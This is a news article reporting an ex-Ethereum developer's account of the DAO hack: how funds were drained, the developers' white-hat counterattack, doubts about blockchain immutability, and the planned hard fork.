Ex-Ethereum Developer: How the DAO Hack Happened And What Comes Next

Advertisement

Kenneth Kappler, CCO of Ethcore and an ex-Ethereum developer, offered an inside view on how the attack on the Decentralized Autonomous Organization (DAO) took place and gave his views on how future attacks can be prevented, according to Techworld. Kappler spoke at a London Tech Week event aimed at explaining blockchain technology.

Problems with the DAO code were evident to many people before the DAO attack materialized, he said. Many realized the functionality wouldn’t work as advertised and they would have to vote to move funds to a new code. They thought they would have to rewrite the code, redeploy it elsewhere and move the funds.

The Hacker Strikes

Before the community had a chance to do this, however, someone found a way to use the bugs in the code to withdraw money from the DAO. This began at around 4 a.m. on a Friday. By 7 a.m., $45 million had been withdrawn, the price of ether fell 40 percent and the price of DAO tokens fell 70 percent.

The developers were able to find the bug the hacker had exploited. They realized the hacker moved funds into another smart contract with a code that prevented it to be sold on an exchange for 27 days, so the developers knew they had time to address the problem.

Immutability Is A Falsehood

The hack demonstrated the fact that blockchain-based currencies are not immutable as claimed, Kappler said, since the systems rely on people accepting them. It is possible to create a new blockchain and pass it on to the network and see if the network switches to the new blockchain.

Four years ago, there was a similar situation with bitcoin, he noted.

To fix the DAO, the core developers decided to roll it back. There was concern, however, that rolling back the DAO could lead to a situation whereby any transaction can be rolled back.

Developers Counterattack

The developers decided to mount a “white hat attack” on the remaining funds in the DAO and the DAO attacker. They spammed the network with dust transactions, allowing them to find the same exploit used to withdraw funds from the original DAO. They were able to drain the hacker’s smart contract.

The funds are now in separate places, giving the developers a chance to make alterations to the software.

Decisions to make such changes are difficult since public blockchains are social constructs and require acceptance by the community. The money only has value if everybody agrees to it. If this trust is lost because people don’t trust the code or they think they have been robbed, the system fails.

There have been adjustments made to bitcoin that have not severely affected its operation, Kappler noted.

Experiment In Decentralization

The developers could have designed the DAO to include administrative controls, allowing someone to stop things from happening, but they did not want to have this. DAO was an experiment to determine if a system can exist without central control.

The solution to the DAO hack will come in the form of a hard fork, which refers to changing the protocol and ensuring the hacked transactions are invalid.

Ethcore is an Ethereum client that integrates directly into browsers, according to its website. It was founded by ex-Ethereum developers and offers an enterprise deployment called Parity.